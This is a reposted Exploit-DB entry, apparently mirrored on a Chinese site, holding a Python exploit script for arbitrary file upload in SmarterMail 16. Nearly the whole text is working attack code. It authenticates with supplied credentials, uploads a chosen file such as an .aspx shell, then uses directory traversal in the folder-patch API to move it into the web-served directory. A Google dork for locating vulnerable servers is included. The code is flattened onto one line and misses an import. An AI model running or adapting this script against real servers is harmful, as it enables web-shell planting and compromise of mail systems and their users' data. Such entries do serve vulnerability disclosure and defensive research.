SmarterMail 16 – Arbitrary File Upload

• Exploit Database
• 122 阅读

• 作者： vvhack.org
  日期： 2020-06-12
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48580/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135

  # Exploit Title: SmarterMail 16 - Arbitrary File Upload # Google Dork: inurl:/interface/root # Date: 2020-06-10 # Exploit Author: vvhack.org # Vendor Homepage: https://www.smartertools.com # Software Link: https://www.smartertools.com # Version: 16.x # Tested on: Windows # CVE : N/A   #!/usr/bin/python3 import requests, json, argparse from requests_toolbelt.multipart.encoder import MultipartEncoder   #example usage: #Authenticated #python3 exp.py -w http://mail.site.com/ -f ast.aspx #Change username & password !   class Tak: def __init__(self): self.file_upload() self.shell_upload()   def loginned(self): self.urls = results.wbsn + '/api/v1/auth/authenticate-user' self.myobja = {"username":"mail@mail.com","password":"password","language":"en"} self.xx = requests.post(self.urls, data = self.myobja) self.data = json.loads(self.xx.text) self.das = self.data['accessToken'] self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das}   def loginned_folder(self): self.loginned() self.url = results.wbsn + '/api/v1/mail/messages' myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]} x = requests.post(self.url, data = myobj, headers=self.headers) print(x.text)   def create_folder(self): self.loginned() self.urlz = results.wbsn + '/api/v1/filestorage/folder-put' myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"} myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"} x = requests.post(self.urlz, data = myobj, headers=self.headers) x = requests.post(self.urlz, data = myobj2, headers=self.headers) print(x.text)   def file_upload(self): self.create_folder() ''' #resumableChunkNumber=1& #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319& #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg& #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate", #print(self.xz) #print(self.xz.headers) ''' size = os.path.getsize(results.wbsf) print(size) replace_file = results.wbsf.replace(".","") with open(results.wbsf, "rb") as outf: contents = outf.read() multipart_data = MultipartEncoder( fields={ "context": "file-storage", #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}', "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}', "resumableChunkNumber": "1", "resumableChunkSize": "2097152", "resumableCurrentChunkSize": str(size), "resumableTotalSize": str(size), "resumableType": "image/jpeg", #"resumableIdentifier": "955319-112097jpg", "resumableIdentifier": str(size) + "-" + str(replace_file), "resumableFilename": results.wbsf, "resumableRelativePath": results.wbsf, "resumableTotalChunks": "1", "file": ( 'blob',#112097.jpg', #open(file, "rb"), contents, #file, #"image/jpeg" "application/octet-stream" #'text/plain' )   } ) ''' http_proxy = "http://127.0.0.1:8080" proxyDict = { "http": http_proxy, } ''' # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.)>> proxies=proxyDict self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, 'Authorization': "Bearer " + self.das, 'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data)   def shell_upload(self):   ''' http_proxy = "http://127.0.0.1:8080" proxyDict = { "http": http_proxy, } '''   json_data = { "folder": "Root Folder\\testos1\\", "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\", "parentFolder": "", "newParentFolder": "Root Folder\\testos2" } #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict) r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers) print(results.wbsn + "/testos1/" + results.wbsf)   if __name__ == '__main__':   parser = argparse.ArgumentParser() parser.add_argument('-f', action='store', dest='wbsf', help='Filename') parser.add_argument('-w', action='store', dest='wbsn', help='Target') parser.add_argument('--version', action='version', version='SmartMail Knock Knock') results = parser.parse_args()   tako = Tak() tako